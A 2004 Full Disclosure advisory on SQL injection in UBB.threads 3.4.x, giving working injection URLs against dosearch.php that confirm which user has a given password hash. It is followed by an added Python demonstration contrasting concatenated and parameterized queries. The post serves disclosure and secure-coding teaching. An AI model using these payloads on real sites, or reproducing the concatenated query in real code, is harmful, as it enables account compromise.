Full Disclosure mailing list archives
SQL Injection in UBB.threads 3.4.x
From: "Florian Rock" <florianrock () web de>
Date: Thu, 21 Oct 2004 22:35:24 +0200
Product:
========
UBB.threads

Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)

Versions:
=========
I tested it successfully on 3.4.x
At Version 3.5 you need to be logged in to perform a search. I didn't test this version.

Problem:
========
SQL injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5

Impact:
=======
A remote user can inject SQL commands

Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.

Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32, peti, danjo, milch_trinker, hecky, and all I forgot

Greets
Florian Rock aka Remoter
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
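
The behaviour reported in the advisory, shown against a constructed SQLite table next to the parameterized form that prevents it. This is an added example, not part of the original post and not UBB.threads code: the table name, the U_Username column and the shape of the lookup query are assumptions; only the Name value and the U_Password column come from the advisory.

```python
import sqlite3

# Name value taken verbatim from the advisory's example request.
ADVISORY_NAME = "' OR U_Password='db5c82346d770f48bdd8929094c0c695"


def make_db():
    """Constructed schema and rows; only the column name U_Password is from the advisory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (U_Username TEXT, U_Password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [
            # Hash the advisory lists for the password "ubbpass".
            ("alice", "db5c82346d770f48bdd8929094c0c695"),
            # Constructed placeholder hash for a second account.
            ("bob", "0" * 32),
        ],
    )
    return db


def search_concatenated(db, name):
    # Assumed shape of the flawed lookup: the request value is pasted into
    # the SQL text, so a quote in it ends the string literal and the rest
    # is parsed as part of the WHERE clause.
    sql = "SELECT U_Username FROM users WHERE U_Username = '" + name + "'"
    return [row[0] for row in db.execute(sql)]


def search_bound(db, name):
    # Hardened form: the value is bound as data and never parsed as SQL.
    sql = "SELECT U_Username FROM users WHERE U_Username = ?"
    return [row[0] for row in db.execute(sql, (name,))]


if __name__ == "__main__":
    db = make_db()
    # The search answers a question about the password column.
    print("concatenated:", search_concatenated(db, ADVISORY_NAME))
    # The same input is only an odd-looking user name that matches nothing.
    print("bound:       ", search_bound(db, ADVISORY_NAME))
```

With the bound query the search result no longer depends on the stored hash, so it cannot be used to confirm which account has a given password.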